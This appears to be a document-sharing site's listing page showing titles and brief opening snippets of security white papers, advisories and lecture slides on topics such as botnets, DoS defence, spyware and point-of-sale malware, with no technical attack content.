Security A to Z the most important terms Security A to Z the most important terms Part 1: A to D UNDERSTAND THE OFFICIAL TERMINOLOGY. This is F-Secure Labs. Learn more about the most important security terms with our official explanations from

More information

Data Centers Protection from DoS attacks. Trends and solutions. Michael Soukonnik, Radware Ltd michaels@radware.com Riga. Baltic IT&T. 21.04.

Data Centers Protection from DoS attacks. Trends and solutions. Michael Soukonnik, Radware Ltd michaels@radware.com Riga. Baltic IT&T. 21.04. Data Centers Protection from DoS attacks. Trends and solutions Michael Soukonnik, Radware Ltd michaels@radware.com Riga. Baltic IT&T. 21.04.2010 Cybercrime Trends Page 2 Types of DoS attacks and classical

More information

Load balancing Microsoft IAG

Load balancing Microsoft IAG Load balancing Microsoft IAG Using ZXTM with Microsoft IAG (Intelligent Application Gateway) Server Zeus Technology Limited Zeus Technology UK: +44 (0)1223 525000 The Jeffreys Building 1955 Landings Drive

More information

Advanced approach to network security and performance monitoring

Advanced approach to network security and performance monitoring Advanced approach to network security and performance monitoring Michal Drozd TrustPort Threat Intelligence Product Manager 18 slides Agenda Network monitoring Security and performance problems Common

More information

ENEE 757 CMSC 818V. Prof. Tudor Dumitraș Assistant Professor, ECE University of Maryland, College Park

ENEE 757 CMSC 818V. Prof. Tudor Dumitraș Assistant Professor, ECE University of Maryland, College Park 21. Botnets ENEE 757 CMSC 818V Prof. Tudor Dumitraș Assistant Professor, ECE University of Maryland, College Park http://ter.ps/757 https://www.facebook.com/sdsatumd Today s Lecture Where we ve been AuthenDcaDon

More information

Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet

Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet Prepared by: Roberto Suggi Liverani Senior Security Consultant Security-Assessment.com

More information

Agenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka

Agenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka Taxonomy of Botnet Threats Trend Micro Inc. Presented by Tushar Ranka Agenda Summary Background Taxonomy Attacking Behavior Command & Control Rallying Mechanisms Communication Protocols Evasion Techniques

More information

SAC 025 SSAC Advisory on Fast Flux Hosting and DNS

SAC 025 SSAC Advisory on Fast Flux Hosting and DNS Fast and Double Flux Attacks 1 SAC 025 SSAC Advisory on Fast Flux Hosting and DNS An Advisory from the ICANN Security and Stability Advisory Committee (SSAC) January 2008 Fast and Double Flux Attacks 2

More information

Online Payments Threats

Online Payments Threats July 3, 2012 Introduction...2 Tested Products...2 Used Configuration...3 Real Malware Inspiration...3 Total Scores Chart...4 Conclusion...4 About matousec.com...4 Detailed Descriptions of Tests...5 Detailed

More information

WEBTHREATS. Constantly Evolving Web Threats Require Revolutionary Security. Securing Your Web World

WEBTHREATS. Constantly Evolving Web Threats Require Revolutionary Security. Securing Your Web World Securing Your Web World WEBTHREATS Constantly Evolving Web Threats Require Revolutionary Security ANTI-SPYWARE ANTI-SPAM WEB REPUTATION ANTI-PHISHING WEB FILTERING Web Threats Are Serious Business Your

More information

Computer Security CS 426 Lecture 36. CS426 Fall 2010/Lecture 36 1

Computer Security CS 426 Lecture 36. CS426 Fall 2010/Lecture 36 1 Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls CS426 Fall 2010/Lecture 36 1 Announcements There will be a quiz on Wed There will be a guest lecture on Friday, by Prof. Chris Clifton

More information

UNMASKCONTENT: THE CASE STUDY

UNMASKCONTENT: THE CASE STUDY DIGITONTO LLC. UNMASKCONTENT: THE CASE STUDY The mystery UnmaskContent.com v1.0 Contents I. CASE 1: Malware Alert... 2 a. Scenario... 2 b. Data Collection... 2 c. Data Aggregation... 3 d. Data Enumeration...

More information

Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers

Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers By Deral (PercX) Heiland and Michael (omi) Belton Over the past year, one focus of the Foofus.NET

More information

Doyourwebsitebot defensesaddressthe changingthreat landscape?

Doyourwebsitebot defensesaddressthe changingthreat landscape? WHITEPAPER Doyourwebsitebot defensesaddressthe changingthreat landscape? Don tletbotsturnaminorincident intoamegasecuritybreach 1.866.423.0606 Executive Summary The website security threat landscape has

More information

Backoff: New Point of Sale Malware. 31 July 2014. National Cybersecurity and Communications Integration Center

Backoff: New Point of Sale Malware. 31 July 2014. National Cybersecurity and Communications Integration Center Backoff: New Point of Sale Malware 31 July 2014 National Cybersecurity and Communications Integration Center Contents: Executive Summary... 3 Analytic Overview... 3 Capabilities... 3 Variants... 4 Command

More information

Practical guide for secure Christmas shopping. Navid

Practical guide for secure Christmas shopping. Navid Practical guide for secure Christmas shopping Navid 1 CONTENTS 1. Introduction 3 2. Internet risks: Threats to secure transactions 3 3. What criteria should a secure e-commerce page meet?...4 4. What security

More information

5 Design Principles for Advanced Malware Protection

5 Design Principles for Advanced Malware Protection White Paper 5 Design Principles for Advanced Malware Protection Winning the war against next-generation threats White Paper Table of Contents Executive Summary 1 Advanced Malware Defined 1 Understanding

More information

Spyware. Summary. Overview of Spyware. Who Is Spying?

Spyware. Summary. Overview of Spyware. Who Is Spying? Spyware US-CERT Summary This paper gives an overview of spyware and outlines some practices to defend against it. Spyware is becoming more widespread as online attackers and traditional criminals use it

More information

About Botnet, and the influence that Botnet gives to broadband ISP

About Botnet, and the influence that Botnet gives to broadband ISP About net, and the influence that net gives to broadband ISP Masaru AKAI BB Technology / SBB-SIRT Agenda Who are we? What is net? About Telecom-ISAC-Japan Analyzing code How does net work? BB Technology

More information

THE PROXY SERVER 1 1 PURPOSE 3 2 USAGE EXAMPLES 4 3 STARTING THE PROXY SERVER 5 4 READING THE LOG 6

THE PROXY SERVER 1 1 PURPOSE 3 2 USAGE EXAMPLES 4 3 STARTING THE PROXY SERVER 5 4 READING THE LOG 6 The Proxy Server THE PROXY SERVER 1 1 PURPOSE 3 2 USAGE EXAMPLES 4 3 STARTING THE PROXY SERVER 5 4 READING THE LOG 6 2 1 Purpose The proxy server acts as an intermediate server that relays requests between

More information

Protecting Organizations from Spyware

Protecting Organizations from Spyware A Websense White Paper Protecting Organizations from Spyware Abstract: Once considered only an annoyance, spyware has evolved from a nuisance to a malicious threat. Preventing spyware from infiltrating

More information

TAKING DOWN THE WORLD S LARGEST BOTNETS

TAKING DOWN THE WORLD S LARGEST BOTNETS TAKING DOWN THE WORLD S LARGEST BOTNETS Ali Mesdaq FireEye, Inc. Session ID: CLE W03 Session Classification: Advanced Credit Atif Mushtaq > Ali Mesdaq Real FireEye veteran Specialized in Botnets and CnC

More information

HoneyBOT User Guide A Windows based honeypot solution

HoneyBOT User Guide A Windows based honeypot solution HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3

More information

Advanced Persistent Threats

Advanced Persistent Threats White Paper INTRODUCTION Although most business leaders and IT managers believe their security technologies adequately defend against low-level threats, instances of (APTs) have increased. APTs, which

More information

Multifaceted Approach to Understanding the Botnet Phenomenon

Multifaceted Approach to Understanding the Botnet Phenomenon Multifaceted Approach to Understanding the Botnet Phenomenon Christos P. Margiolas University of Crete A brief presentation for the paper: Multifaceted Approach to Understanding the Botnet Phenomenon Basic

More information

Cyber Security and Critical Information Infrastructure

Cyber Security and Critical Information Infrastructure Cyber Security and Critical Information Infrastructure Dr. Gulshan Rai Director General Indian Computer Emergency Response Team (CERT- In) grai [at] cert-in.org.in The Complexity of Today s Network Changes

More information

Introduction The Case Study Technical Background The Underground Economy The Economic Model Discussion

Introduction The Case Study Technical Background The Underground Economy The Economic Model Discussion Internet Security Seminar 2013 Introduction The Case Study Technical Background The Underground Economy The Economic Model Discussion An overview of the paper In-depth analysis of fake Antivirus companies

More information

Protecting Data From the Cyber Theft Pandemic. A FireEye Whitepaper - April, 2009

Protecting Data From the Cyber Theft Pandemic. A FireEye Whitepaper - April, 2009 Protecting Data From the Cyber Theft Pandemic A FireEye Whitepaper - April, 2009 Table of Contents Executive Summary Page 3 Today s Insider Threat Is Stealth Malware Page 3 Stealth Malware Attacks Are

More information

Internet Special Ops Stalking Badness Through Data Mining. Paul Vixie Andrew Fried Dr. Chris Lee

Internet Special Ops Stalking Badness Through Data Mining. Paul Vixie Andrew Fried Dr. Chris Lee Paul Vixie Andrew Fried Dr. Chris Lee Grandma has a problem An email or web banner offered her a free demo of the game Bejeweled 3D She clicked yes to download a program. New unrecognized malware? Anti-virus

More information

T14 SECURITY TESTING: ARE YOU A DEER IN THE HEADLIGHTS? Ryan English SPI Dynamics Inc BIO PRESENTATION. Thursday, May 18, 2006 1:30PM

T14 SECURITY TESTING: ARE YOU A DEER IN THE HEADLIGHTS? Ryan English SPI Dynamics Inc BIO PRESENTATION. Thursday, May 18, 2006 1:30PM BIO PRESENTATION T14 Thursday, May 18, 2006 1:30PM SECURITY TESTING: ARE YOU A DEER IN THE HEADLIGHTS? Ryan English SPI Dynamics Inc International Conference On Software Testing Analysis and Review May

More information

Evolving Threats and Attacks: A Cloud Service Provider s viewpoint. John Howie Senior Director Online Services Security and Compliance

Evolving Threats and Attacks: A Cloud Service Provider s viewpoint. John Howie Senior Director Online Services Security and Compliance Evolving Threats and Attacks: A Cloud Service Provider s viewpoint John Howie Senior Director Online Services Security and Compliance Introduction Microsoft s Cloud Infrastructure Evolution of Threats

More information

Streamlining Web and Email Security

Streamlining Web and Email Security How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Streamlining Web and Email Security sponsored by Introduction to Realtime Publishers by Don Jones, Series Editor

More information

Secure Web Appliance. SSL Intercept

Secure Web Appliance. SSL Intercept Secure Web Appliance SSL Intercept Table of Contents 1. Introduction... 1 1.1. About CYAN Secure Web Appliance... 1 1.2. About SSL Intercept... 1 1.3. About this Manual... 1 1.3.1. Document Conventions...

More information